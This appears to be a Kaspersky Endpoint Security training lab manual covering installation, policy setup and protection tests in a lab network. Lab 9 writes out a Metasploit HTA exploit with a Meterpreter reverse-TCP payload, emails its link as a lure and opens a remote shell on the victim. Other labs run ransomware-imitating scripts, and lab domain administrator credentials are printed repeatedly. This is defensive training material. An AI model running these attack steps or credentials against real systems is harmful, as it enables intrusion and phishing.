Lab Manual

KL 002.11.6: Kaspersky Endpoint Security and Management.
Lab 1. How to install Kaspersky Security Center .........................................................................................3

Task A: Install the Administration Server and Web Console of Kaspersky Security Center.................3
Task B: Proceed through the Quick Start Wizard to configure Kaspersky Security Center
Administration Server ........................................................................................................................ 11
Lab 2. How to deploy Kaspersky Endpoint Security.................................................................................. 18
Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security
Center Administration Server ............................................................................................................. 18
Task B: Create a stand-alone installation package for Kaspersky Endpoint Security ....................... 24
Task C: Install a stand-alone package of Kaspersky Endpoint Security for Windows on a laptop .... 26
Task D: Study the results of deploying protection in the network ...................................................... 27
Lab 3. How to create a structure for the managed computers .................................................................. 28
Task A: Create groups for workstations, laptops and servers ........................................................... 29
Task B: Configure rules to move computers into the groups ............................................................. 30
Lab 4. How to test protection of Windows Subsystem for Linux ............................................................... 35
Lab 5. How to configure Mail Threat Protection ........................................................................................ 38
Task A: Send a message with an executable file .............................................................................. 38
Task B: Edit the attachment filter ....................................................................................................... 40
Task C: Make sure that Mail Threat Protection does not edit attachments anymore ........................ 42
Lab 6. How to test Web Threat Protection ................................................................................................ 43
Task A: Make sure that Web Threat Protection scans https traffic by default ................................... 43
Task B: Turn off encrypted traffic scanning for the PowerShell application....................................... 44
Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to
download the test virus over https ..................................................................................................... 46
Lab 7. How to test protection of network folders against ransomware ...................................................... 47
Task A: Simulate a ransomware infection ......................................................................................... 47
Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine......... 51
Task C: Allow encryption within network shared folders and configure exclusions for trusted network
devices ............................................................................................................................................... 52
Task D: Make sure that exclusions for trusted network devices work correctly ................................. 54
Lab 8. How to test protection against fileless threats ................................................................................ 55
Lab 9. How to check health of Exploit Prevention ..................................................................................... 56
Task A: Simulate a hacker attack to get access to a remote computer ............................................. 57
Task B: Disable some of the protection components ........................................................................ 60
Task C: Test protection against exploits ............................................................................................ 61
Lab 10. Improve workstations’ protection against ransomware ................................................................ 64
Task A: Simulate a ransomware infection ......................................................................................... 64
Task B: Prohibit all programs except for trusted from editing and deleting documents ..................... 65
Task C: Configure storing events on the Administration Server ........................................................ 69
Task D: Simulate encrypting a document and check the result ......................................................... 71
Lab 11. How to test Network Threat Protection......................................................................................... 72
Task A: Disable Exploit Prevention.................................................................................................... 72
Task B: Simulate a hacker attack by exploiting an SMB vulnerability and get access to a remote
computer ............................................................................................................................................ 73
Task C: Study the Network attack report ........................................................................................... 75
Task D: Unblock the Kali computer ................................................................................................... 78
Task E: Configure exclusions in the properties of Network Threat Protection................................... 80

Task F: Imitate an attack from Kali on Alex-Desktop and check the results ...................................... 81
Lab 12. How to configure password protection ......................................................................................... 82
Task A: Find a computer where protection is disabled ...................................................................... 82
Task B: Protect Kaspersky Endpoint Security with a password ........................................................ 84
Task C: Make sure that Kaspersky Endpoint Security is password-protected .................................. 87
Task D: Set a password for Network Agent uninstallation ................................................................. 88
Lab 13. How to configure Application Control ........................................................................................... 90
Task A: Create a category for all web browsers except Internet Explorer ......................................... 90
Task B: Prohibit the users from starting any browsers except for Internet Explorer .......................... 92
Task C: Start Mozilla Firefox and Internet Explorer ........................................................................... 95
Lab 14. How to block start of unknown applications in the network .......................................................... 96
Task A: Create an application category that prohibits starting unknown files.................................... 97
Task B: Change the policy so as to prohibit all users from starting unknown files ...........................101
Task C: Make sure that the settings work correctly ..........................................................................103
Lab 15. How to block USB flash drives ....................................................................................................105
Task A: Configure blocking USB flash drives ...................................................................................105
Task B: Test blocking USB flash drives ............................................................................................109
Task C: Receive the request from the user ......................................................................................110
Lab 16. How to configure granular permissions for USB flash drives ......................................................111
Task A: Prohibit all users from writing files to USB flash drives .......................................................111
Task B: Allow domain users to write files to trusted USB flash drives ..............................................114
Lab 17. How to configure web access control ..........................................................................................119
Task A: Create a rule to block access to cryptocurrency exchange websites ..................................120
Task B: Test whether access to cryptocurrency exchange websites is blocked ..............................123
Task C: Consult reports in Kaspersky Security Center.....................................................................124
Lab 18. How to configure Adaptive Anomaly Control ...............................................................................125
Task A: Configure blocking macros and scripts in office documents................................................125
Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro .................................127
Lab 19. How to configure the dashboard .................................................................................................129
Task A: Add new widgets to the dashboard .....................................................................................130
Task B: Delete and rearrange widgets .............................................................................................133
Lab 20. How to configure maintenance tools ...........................................................................................134
Task A: Delete unused reports .........................................................................................................135
Task B: Create a weekly report about infected computers ...............................................................138
Task C: Configure the most important reports to be emailed ...........................................................140
Lab 21. How to collect diagnostic information ..........................................................................................143
Scenario. You need to protect less than 100 computers with Kaspersky Endpoint Security for Business at ABC
Inc. One Administration Server and the Express edition of Microsoft SQL Server are enough for managing
protection within such a network. Install Kaspersky Security Center Administration Server on a dedicated computer
running Windows Server 2016. Microsoft SQL server has been installed on the virtual machine beforehand.
Contents. In this lab, we will:
Install the Administration Server and other Kaspersky Security Center components
Proceed through the Quick Start Wizard to configure Kaspersky Security Center
Administration Server
Install Kaspersky Security Center Administration Server with the default settings. The Web Console is
implemented as an independent component that has a separate distribution; its installer starts automatically as
soon as the KSC Administration Server installation completes.
The KSC and DC machines must be powered on.
The task is performed on KSC.
Start the Kaspersky Security

Center installer:
Desktop\ksc_13_13.0.0.1124
7_full_en.exe
Click Install Kaspersky
Security Center
KL 002.11.6: Lab 1.
Kaspersky Endpoint Security and Management How to install Kaspersky Security Center
3. On the welcome page, click Next
On the following page, make sure

that the required version of .NET
Framework is installed and click
Next
Accept the License Agreement

and the Privacy Policy.
Click Next
KL 002.11.6: Lab 1.
Select Standard installation and

click Next
Select Install both Administration

Consoles and click Next
Keep the option Fewer than 100

networked devices selected and
click Next
KL 002.11.6: Lab 1.
Select Microsoft SQL Server

and click Next
Click Browse
Select the KSC\SQLEXPRESS

server and click OK
KL 002.11.6: Lab 1.
To proceed with the installation of

Kaspersky Security Center, click
Next
Select Microsoft Windows

Authentication mode and click
Next
To begin the installation, click

Install
KL 002.11.6: Lab 1.
As soon as KSC Administration

Server is installed, KSC Web
Console installer starts
automatically. Select a language
for the installation wizard
On the welcome page, click Next
Accept the license agreement

and click Next
Do not change the destination

folder
Click Next
KL 002.11.6: Lab 1.
Specify the connection address:

127.0.0.1
Do not change the port
Click Test
Make sure that port 8080

is accessible on 127.0.0.1
Click OK
Leave these settings unchanged

Click Next
Select Generate new certificate

Click Next
KL 002.11.6: Lab 1.
Make sure that KSC is specified in

the list of trusted Administration
Servers
Click Next to proceed with
the installation
To begin the installation, click

Install
Close the Kaspersky Security

Center Web Console Setup
Wizard: Click Finish
KL 002.11.6: Lab 1.
Close the Kaspersky Security

Center Administration Server
Setup Wizard: Click Finish
Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the
Quick Start Wizard. Add an activation code. Configure notifications to administrator@abc.lab via SMTP server
10.28.0.10. Accept the KSN agreement. Download signature updates. Do not start the Remote Installation Wizard.
Enable automatic distribution for the license.
Start the Google

Chrome browser. In the
address bar, type
https://127.0.0.1:8080
Click Advanced
Click the link Proceed
to 127.0.0.1 (unsafe)
KL 002.11.6: Lab 1.
Enter the username

abc\administrator and
password Ka5per5Ky
Click the button Sign in
Skip the tutorial. Click X

to close it
KL 002.11.6: Lab 1.
On the welcome page of

the wizard, click Start
We will not use a proxy

server. Click Next
43. Click Next
Select Workstations
and Windows
Click Next
KL 002.11.6: Lab 1.
Select Lite
encryption (56-bit)
Click Next
Select the
Workstations Web
plug-in of Kaspersky
Endpoint Security
Click Next
50. Click Next
Select the Kaspersky

Endpoint Security for
Windows package
with lite encryption
Click Next
KL 002.11.6: Lab 1.
Agree to use KSN

Click Next
Select Add key file

Click Enter
activation code
and specify the
Code
(Desktop\Key_File.key)
Select the checkbox

Automatically
distribute license key
to managed devices
Click Next
KL 002.11.6: Lab 1.
59. Click Next
60. Click Create then Next

KL 002.11.6: Lab 1.
For the Email

addresses of
recipients, enter
administrator@abc.lab
For the SMTP server
address, specify
10.28.0.10
For the SMTP server
port, specify 25
Click Next
Click Next
Clear the checkbox

Run Protection
Deployment Wizard
Click Finish
You installed the Administration Server, Kaspersky Security Center Web Console and management plug-in for
Kaspersky Endpoint Security. Also, you completed the Quick Start Wizard: created the default tasks and
policies, accepted the KSN agreement, configured notifications for the administrator and enabled
autodistribution for the key.
Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.
KL 002.11.6: Lab 2.
Kaspersky Endpoint Security and Management How to deploy Kaspersky Endpoint Security
Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the
Kaspersky Security Center Administration Server already. Now, use the Remote Installation Wizard to install
Kaspersky Endpoint Security and Network Agent on the computers discovered by the Administration Server.
Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center
Administration Server
Create a stand-alone installation package for Kaspersky Endpoint Security
Install a stand-alone package of Kaspersky Endpoint Security for Windows on a laptop
Study the results of deploying protection in the network
Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access
the computers, specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the
other settings unchanged.
Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.
Any third-party antivirus could be installed on the Alex computer, which may theoretically complicate
installation. However, the installation task can automatically
uninstall the third-party software.
KL 002.11.6: Lab 2.
The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.
Go to Discovery &
Deployment |
Deployment &
Assignment |
Installation Packages
| In progress Tab
Click the link Kaspersky
Windows
Wait for the button

Show EULA to
appear and click it
KL 002.11.6: Lab 2.
Select the checkboxes

and click Accept to
accept the License
Agreements
Wait for the package to
download
On the side menu,

select Devices |
Polices & Profiles
Select the policy of
Kaspersky Security
Center Network Agent
Switch to the
Application Settings
tab and open the
Network section
Open the Connectivity
settings
Set the
Synchronization
interval (min) to 3
The synchronization
interval is changed to
speed up demonstration
during our labs. We don’t
recommend that you
reduce it in the
production environment
KL 002.11.6: Lab 2.
Select OK
Click Save
On the side menu,

select Discovery &
Deployment |
Deployment &
Assignment |
Protection
Deployment Wizard
Select Kaspersky
Windows in the list of
installation packages
Click Next
Select Do not add

license key to
installation package
Click Next
Select Kaspersky
Security Center 13
Network Agent
Click Next
KL 002.11.6: Lab 2.
Click Select devices

for installation
Expand the Managed
devices node. Find
and select the KSC
computer
Expand the
Unassigned devices
list. Find and select the
Alex-Desktop
computer
Click Next
Without changing the

package copying
parameters, click Next
Click Next without

changing the
restart parameters
KL 002.11.6: Lab 2.
Agree to uninstall
incompatible
applications and click
Next
Agree to Move
unassigned devices
to group after the
installation, select
Managed devices
and click Next
To specify the name and

password of an
administrator who can
access the computers,
select Account
required (Network
Agent is not used)
Click Add to specify an
account
Type the
abc\administrator
username and
Ka5per5Ky password
and click OK
Click Next
Select the checkbox

Run the task after
the Wizard finishes
Click OK
KL 002.11.6: Lab 2.
On the side menu, select

Devices | Tasks
Click the installation
task of Kaspersky
Windows: Remote
installation task
Make sure that the task

is running on two
computers
Wait for the notification

that the computers
have to be restarted to
complete the task
successfully
Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the stand-alone
package creation wizard. Add the Network Agent to the installation package and select the group into which
the target computers are to be moved after the installation.
KL 002.11.6: Lab 2.
Switch to Discovery &

Deployment |
Deployment &
Assignment |
Installation Packages
Select the Kaspersky
Windows installation
package
Click the Deploy button
Select Using a stand-

alone package
Click Next
Select Install Network

Agent together with
this application
Click Next
Configure relocation:
Select Move
unassigned devices
to this group
Click Select group
KL 002.11.6: Lab 2.
Select Managed
devices
Click OK
Click Next
The page that opens

shows the path to
the installation file
Click Finish to close
the wizard
From the client computer, open the KLSHARE folder on the Administration Server. Find and run the stand-
alone package.
The task is performed on Tom-Laptop.
On the Tom-Laptop machine, start

Windows Explorer
Open the shared folder
\\KSC\klshare\PkgInst\
KL 002.11.6: Lab 2.
Run the installer

Click Start installation
Wait for the installation to complete and

click OK to close the window
Study the results of the installation task. Make sure that the computers have been moved to the Managed devices
group. Make sure that Network Agent and Kaspersky Endpoint Security are installed on the computers.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Monitoring &
Reporting | Reports
KL 002.11.6: Lab 3.
Kaspersky Endpoint Security and Management How to create a structure for the managed computers
Click Report on
Kaspersky
software versions
Make sure that it
displays three
instances of Kaspersky
Endpoint Security and
three instances of
Network Agent, exactly
the same number as
there are network
computers
Close the report
You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and
a stand-alone package.
If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to
restart the machine.
If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on
the target machines, the installation will return an error.
Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming
that servers, desktops and laptops need different settings, create respective groups for them and move the computers
there. To save effort in hand-moving the computers into their appropriate groups, create relocation rules and configure
conditions based on the operating systems and network parameters of the computers.
Create groups for workstations, laptops and servers

Configure rules to move computers into the groups
KL 002.11.6: Lab 3.
Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops
and Laptops subgroups within the Workstations group.
On the side menu,

select Devices |
Hierarchy
of groups
Select the group
Managed devices
To add a
subgroup, click
Add
Type Servers for

the group name
and click Add
KL 002.11.6: Lab 3.
Create another
subgroup named
Workstations
Select the
Workstations
group and click
Add
Type Desktops
for the group
name
Repeat steps 6 and
7 to create the
Laptops group
Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers that will
work permanently and move servers to the Servers group. Use the Network agent is running condition (Yes)
and the Operating system version condition with the Windows Server 2016 value. You can find both conditions
on the Applications tab.
Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of
the Operating system version, use the IP Range condition on the Network tab. For desktop computers,
specify range 10.28.0.100–10.28.0.199; and for laptops, 10.28.0.200–10.28.0.254.
KL 002.11.6: Lab 3.
Go to Discovery & Deployment |

Deployment & Assignment |
Moving rules
Click Add
Type Servers for the rule name

Specify the destination group: On
the drop-down list, select the
Managed devices | Servers
subgroup
Select the mode Apply rule
continuously
To apply the rule to all computers,
clear the checkbox Move only
devices that do not belong to
an administration group
Select the Enable rule checkbox
Open Rule conditions

Switch to the Applications tab
Specify that the Network Agent is
installed: On the respective drop-
down list, select Yes
To apply the rule to computers
with server operating systems,
enable the Operating system
version parameter
Scroll the list to the bottom and
switch to the second page
Select the operating system
Microsoft Windows Server 2016
Click Save to save the rule
KL 002.11.6: Lab 3.
Click Add to create a

rule for desktops
Type Desktops for the rule name

Managed devices | Workstations
| Desktops subgroup
continuously
To apply the rule to all computers,
clear the checkbox Move only
Switch to the Rule Conditions tab

To configure conditions for IP
addresses, switch to the
Network tab
To apply the rule to the computers
whose addresses belong to a
specific interval, select the IP range
checkbox
Specify IP range 10.28.0.100—
10.28.0.199
KL 002.11.6: Lab 3.
Switch to the Applications tab

Create a rule named Laptops

Managed devices | Workstations
| Laptops subgroup
continuously
Clear the checkbox Move only
Open the Rule conditions tab

Switch to the Network tab
Select the IP range checkbox
Specify IP range 10.28.0.200—
10.28.0.254
KL 002.11.6: Lab 3.
Switch to the Applications section

Make sure that there

are five relocation
rules in the list: Two
have been created
automatically for
installation packages,
and three by you
Go to Devices |
Managed Devices
At the top of the
page, click the path
KSC / Managed
Devices
On the group
structure tree, select
KSC | Managed
devices | Servers
KL 002.11.6: Lab 4.
Kaspersky Endpoint Security and Management How to test protection of Windows Subsystem for Linux
Make sure that the

KSC computer,
which is running
Windows Server
2016 operating
system, has been
automatically moved
to the Servers group
In a similar manner, make sure that the other computers have been moved to their respective groups
You installed protection and organized the computers into groups. The default settings are optimized for an
average user of Kaspersky Endpoint Security. They reliably protect computers and minimize the performance
impact. You can adjust the protection-comfort balance as necessary: Reinforce protection in some aspects, and
maybe make concessions in some others aiming to improve the user experience. Further labs will explain how
to fine-tune the protection settings.
Scenario. By default, Kaspersky Endpoint Security supports Windows Subsystem for Linux: It is a compatibility
layer for running Linux applications in the latest versions of Microsoft Windows. In our environment, Windows
Subsystem for Linux is based on Kali Linux 2018. We will run a test malicious file in Windows Subsystem for
Linux and make sure that Kaspersky Security for Windows Server detects and deletes it.
In this lab, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running
under Windows 10.
KL 002.11.6: Lab 4.
The KSC, DC and Tom-Laptop machines must be powered on.
Press WIN+R
Type wsl
Click OK
Copy the eicar dropper’s source code to the /tmp: folder

cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/
Go to the /tmp: directory

cd /tmp/
Compile the eicar dropper using the g++ compiler:

g++ eicar_drop_kl_edu.cpp -o eicar_dropper
KL 002.11.6: Lab 4.
Run the compiled eicar

dropper:
./eicar_dropper
Click Kaspersky Endpoint

Security icon in the notification
area or on the Start menu to
open Kaspersky Endpoint
Security interface
Click Reports
Select the File Threat

Protection report
Find the threat
detection event
Find the results of
processing this threat
This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created
within Windows Subsystem for Linux.
KL 002.11.6: Lab 5.
Kaspersky Endpoint Security and Management How to configure Mail Threat Protection
Scenario. When an administrator emails an executable file to a user who is to run it and thus solve an issue,
Kaspersky Endpoint Security renames the attachment. To save time and avoid explaining the users how to
rename them back, configure Mail Threat Protection not to rename files. At the same time, criminals often use files
with double extension to trick users into running a malicious executable disguised as a document. Such files
should be deleted.
Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files and delete files
with double extension *.pdf.exe.
Send a message with an executable file

Edit the attachment filter
Make sure that Mail Threat Protection does not edit attachments anymore
Send a message to tom@abc.lab with a zipped *.pdf.exe file attached. Receive the message and make sure
that Mail Threat Protection has changed the extension of the archived file.
Start the task on the Alex-Desktop machine.
Connect to Alex-Desktop.
Open Outlook
Create a new message:
— Specify the address. In
the To: box, type
tom@abc.lab
— In the Subject: box, type
Weekly report
— Attach the
Document1.zip file to
the message
(Z:\LabFiles\Lab5)
Click Send to dispatch the
message
KL 002.11.6: Lab 5.
Switch to the Tom-Laptop machine
Run Microsoft Outlook.

Select the received
message
Save the Document1.zip
file to the desktop
Unpack the Document1.zip

archive (select the Extract
all command on the file’s
shortcut menu)
Note that the archived file is
named
Document1.pdf.ex_. Mail
Threat Protection has
changed the extension of
the archived executable file
KL 002.11.6: Lab 5.
In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection processes.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky
Endpoint Security
for Windows
Switch to the
Application
settings tab
Go to the Essential
Threat Protection
section
Open the Mail
Threat Protection
settings
Reconfigure
attachment filtering.
Choose Delete
attachments of
selected types
KL 002.11.6: Lab 5.
Scroll the list down

Disable processing
*.exe
Create a new
attachment filter:
Click Add
In the Extension
field, type *.pdf.exe
Click OK
KL 002.11.6: Lab 5.
On the Alex-Desktop machine, create another

message. Attach the Procmon.zip file (ask the
instructor where this file is located)
In the Subject: box, type IT Service Desk
Click Send
Switch to the Tom-Laptop machine
Open Microsoft Outlook

Save the Procmon.zip file to the
desktop
Unpack the Procmon.zip archive
(select the Extract all command
on the file’s shortcut menu)
Note that in the new message, the
archived file is named
Procmon.exe; Mail Threat
Protection has not renamed it
You have configured Mail Threat Protection not to rename .exe files.
If the network is being attacked through email by a new virus that has not yet been added to either signature
database or KSN, configure Mail Threat Protection to rename or delete all executable attachments.
KL 002.11.6: Lab 6.
Kaspersky Endpoint Security and Management How to test Web Threat Protection
Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the
certificate for this purpose, which sometimes may affect banking or other software that uses its own certificate.
To avoid interaction issues, Kaspersky Endpoint Security permits excluding encrypted traffic from scanning.
Make sure that Web Threat Protection scans https traffic under the default settings
Turn off encrypted traffic scanning for the PowerShell application
Make sure that Web Threat Protection allows the trusted application PowerShell to download the
test virus over https
Run PowerShell, try to download the eicar_com.zip file and check how Kaspersky Endpoint Security will react.
The DC, KSC and Tom-Laptop machines must be powered on.
Press WIN+R
Type powershell
Click OK
KL 002.11.6: Lab 6.
4. Download the eicar_com.zip file via PowerShell over https. Carry out the following command:
Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -
OutFile “C:\temp\eicar_com.zip”
Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell
window
Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file and check how
Kaspersky Endpoint Security will react.
Open Kaspersky
Security Center Web
Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky Endpoint
Security for Windows
KL 002.11.6: Lab 6.
Switch to the
Application settings
tab
Go to the General
settings section
Open Exclusions
To add a trusted
application, click the link
Trusted applications
in the lower-left part of
the page
Click Add
For the application path,

type %systemroot%\
system32\
WindowsPowershell\
v1.0\powershell.exe
Clear the following
checkboxes:
— Do not scan opened
files
— Do not inherit
restrictions of the
parent process
(application)
Select Do not scan
network traffic and
Encrypted traffic only
Click OK three times to
save the exclusion
KL 002.11.6: Lab 6.
Click Save to save the

policy
Confirm that you want to
use the specified
settings: Click Yes
Wait for the policy to be
applied
Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again.
Make sure that Web Threat Protection will not block the test virus if it is downloaded via a trusted application.
21. Download eicar_com.zip over the https secure protocol one more time. Carry out the following command:
Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -
OutFile “C:\temp\eicar_com.zip”
KL 002.11.6: Lab 7.
Kaspersky Endpoint Security and Management How to test protection of network folders against ransomware
To make sure that the file

has been saved
successfully, open the
C:\temp\ directory
Close the PowerShell
window
This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic.
The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web
Threat Protection and Web Control components, and does not influence the Firewall or Network Threat Protection.
Scenario. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If
Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much
money. You want to use the Behavior Detection protection component to counter ransomware.
Simulate a ransomware infection

Check how the Behavior Detection protection component reacted
Allow encryption within network shared folders and configure exclusions for network devices
Make sure that exclusions for network devices work correctly
Disable other protection components that can block the test file earlier than Behavior Detection. Find the
ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware:
Encrypts files in shared network folders and deletes the originals.
Make sure that Kaspersky Endpoint Security has restored the file invoice.txt, and Alex cannot modify files in
the network shared folder anymore.
KL 002.11.6: Lab 7.
Start the task on the KSC machine.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky
Endpoint Security
for Windows
Switch to
the Application
Settings tab
In the Advanced
Threat Protection
section, click Host
Intrusion
Prevention
KL 002.11.6: Lab 7.
Disable the Host

Intrusion
Prevention
Click OK
In the Essential
Threat Protection
section, click
Firewall
Disable Firewall
Click OK
KL 002.11.6: Lab 7.
Save the settings:

Click Save
Confirm that you
want to use the
specified settings:
Click Yes
Wait for the policy to
be applied
Restart the Tom-
Laptop computer
Switch to the Alex-Desktop machine.
Open the shared folder

\\tom-laptop\temp
Make sure that the
invoice.txt file is there
Find the ransomware2.bat file on the desktop. It imitates actions of file encrypting ransomware
Run the
ransomware2.bat file
Check the contents of

the folder \\tom-
laptop\temp
KL 002.11.6: Lab 7.
Open the
invoice.txt.aes file
in Notepad
Make sure that the
invoice.txt.aes file is
encrypted
Close Notepad
Refresh the contents

of the folder \\tom-
laptop\temp
Make sure that the
invoice.txt file has
been restored
In some cases, the original invoice.txt file remains intact because Behavior Detection blocks remote connection as
soon as it detects the encryption attempt, which may happen before the script deletes the original file.
Try to delete the encrypted file

Make sure that access is denied
Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that
the protection component performed.
KL 002.11.6: Lab 7.
Log on to the abc\Tom

account, password
Ka5per5Ky
Open Kaspersky
Endpoint
Security interface
Open the application
reports
Select Behavior
Detection
Make sure that the
malicious encryption
activity attempted
from IP 10.28.0.100
was blocked
Make sure that the

C:\temp\invoice.txt
file was restored
In some cases, Behavior Detection may consider operations performed by design engineering applications as crypto
ransomware activities. To prevent false positives, we recommend that you add such computers to trusted.
KL 002.11.6: Lab 7.
Select the Administration Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-
Desktop computer to the list of exclusions of the Behavior Detection component.
Open Kaspersky
Security Center Web
Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky Endpoint
Switch to the
tab
In the Advanced
Threat Protection
section, click
Behavior detection
Reconfigure protection
of shared folders
against external
encryption: Switch the
action from Block
connection to Notify
To create an
exclusion, click Add
KL 002.11.6: Lab 7.
Create an exclusion.
Type the IP address of
the Alex-Desktop
workstation
(10.28.0.100)
Click OK twice
Save the changes to the policy
The task is performed on Alex-Desktop.
Open the folder

\\tom-laptop\temp\
Delete the file invoice.txt.aes
If file cannot be deleted, delete it on

Tom-Laptop
Find the ransomware2.bat file on the

desktop and run it
Make sure that the invoice.txt file has

been encrypted and the original
invoice.txt file has not been restored
Delete the file invoice.txt.aes
Make sure that the file has been
deleted correctly
In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with
the default settings. The Behavior Detection component takes care of that.
If necessary, the administrator can always specify exclusions for the protection component and allow
specific network devices to encrypt files in shared folders.
KL 002.11.6: Lab 8.
Kaspersky Endpoint Security and Management How to test protection against fileless threats
Scenario.Recently, a new threat vector has become popular, which uses PowerShell, a powerful operating system
administration and management tool. Criminals can run their code in the address space of a PowerShell process.
A fileless attack is hard to detect since malicious code is executed in the memory, unlike an ordinary virus that
stores its files on the local drive. Typically, attacks via PowerShell are performed after the machine has been
compromised using other malicious actions, usually, exploitation of software vulnerabilities.
Contents. In this lab, we will disable KSN and test how anti-malware scan interface (AMSI) detects fileless threats.
Open the c:\temp\ folder

Unpack the bsstest_amsi
archive
Enter the password infected
Press WIN+R
Type powershell
Click OK
Go to the directory of the unpacked script. Carry out cd

c:\temp\bsstest_amsi\bsstest_amsi
KL 002.11.6: Lab 9.
Kaspersky Endpoint Security and Management How to check health of Exploit Prevention
Run the test PowerShell script. Carry out the following command:
.\bsstest_amsi.ps1
Make sure that Kaspersky Endpoint Security blocks the script
Open Kaspersky Endpoint

Security reports
Select AMSI Protection
Make sure that Kaspersky
Endpoint Security has
detected and neutralized
the threat
You’ve made sure that even if some of the protection components are disabled, Kaspersky Endpoint Security
can efficiently interact with the script interpreters built into Microsoft Windows operating systems to detect and
block malicious code.
Scenario. Criminals can exploit vulnerabilities much easier than one would imagine. With such a powerful tool
as Metasploit Framework, a criminal can create an exploit and send it to unsuspecting company employees.
KL 002.11.6: Lab 9.

Simulate a hacker attack to get access to a remote computer
Disable most of the protection components
Test protection against exploits
On the Kali computer, run the Metasploit Framework penetration testing utility. Attack HTA (HTML Application).
The KSC, DC, Kali, Alex-Desktop and Tom-Laptop machines must be powered on.
Exit Kaspersky Endpoint Security. Right-click its icon in the

notification area; on the menu, select Exit
Switch to the Kali computer.
Log on to the hacker account. Password—Ka5per5Ky

Open a Terminal window
Start the Metasploit Framework console. Carry out the following command:
msfconsole
Select the exploit template. Carry out the following command:

use exploit/windows/misc/hta_server
You can use the TAB key to autocomplete commands
Display the list of applications vulnerable to this exploit. Carry out the following command:
show targets
KL 002.11.6: Lab 9.
Set a target. Carry out the following command:

set target 1
Specify the malicious payload. Carry out

set PAYLOAD windows/x64/meterpreter/reverse_tcp
Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
Activate the exploit. Carry out

exploit -j
Copy the http://10.28.0.50:8080/*******.hta link to the clipboard (select Copy Link on the shortcut menu)
Open a new terminal instance
In the terminal, type
mailsend
Specify the following parameters:
— SMTP server address/IP = 10.28.0.10
— From = tom@abc.lab
— To = alex@abc.lab
— Subject = Report
Press ENTER
Paste the link from step 11: http://10.28.0.50:8080/*******.hta
Press ENTER
Type one dot “.”
Press ENTER
KL 002.11.6: Lab 9.
Switch to the Alex-Desktop machine.
Open Microsoft Outlook

Select the received message
Open the link from the message
in a browser
Save the file to the computer
In the warning window, click

Run
Open the Metasploit Framework console.

Make sure that a new session has been opened
27. To connect to the created session, carry out:

sessions 1
where 1 is the number of the recently created
session
You have got full remote access to the Alex-Desktop machine

KL 002.11.6: Lab 9.
To run command prompt, carry out the

command
shell
(Optional) Carry out the whoami command to
get the name of the active user
whoami
In this task, you will disable some of the Kaspersky Endpoint Security protection components.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky
Endpoint Security
for Windows
Switch to the
Application
settings tab
Disable the following
protection
components:
— KSN
— Behavior
Detection
KL 002.11.6: Lab 9.
Switch to Security
Controls section
protection
components:
— Application
Control
— Adaptive
Anomaly Control
Go to the Essential
Threat Protection
section
protection
components:
— File Threat
Protection
— Web Threat
Protection
— Mail Threat
Protection
— AMSI Protection
Click Save to save
the policy
Click Yes to confirm
be applied
In this task, you will test the Exploit Prevention component.
Close the web browser window

Restart the Alex-Desktop computer
Log on to the system
KL 002.11.6: Lab 9.
Open the main window of

Kaspersky Endpoint Security
Click the Security menu on
the left
Make sure that the

Exploit Prevention
component is enabled
Open the Downloads directory

Run the *.hta file
Note that a script run error

has occurred
In the Script Error window,
click No
KL 002.11.6: Lab 9.
Open Kaspersky Endpoint

Security reports
Switch to the report of the
Exploit Prevention
component
Make sure that the exploit
was detected

Open the Metasploit console
57. Press CTRL+C to interrupt the current process
58. Press Y to confirm and then press ENTER
59. Carry out the following command:

background
Carry out the following command:

sessions
Note that there are no active sessions on the criminal’s
computer
In this lab, we made sure that the multitier defense system of Kaspersky Endpoint Security repels advanced
threats even when the main protection components are disabled.
KL 002.11.6: Lab 10.
Kaspersky Endpoint Security and Management Improve workstations’ protection against ransomware
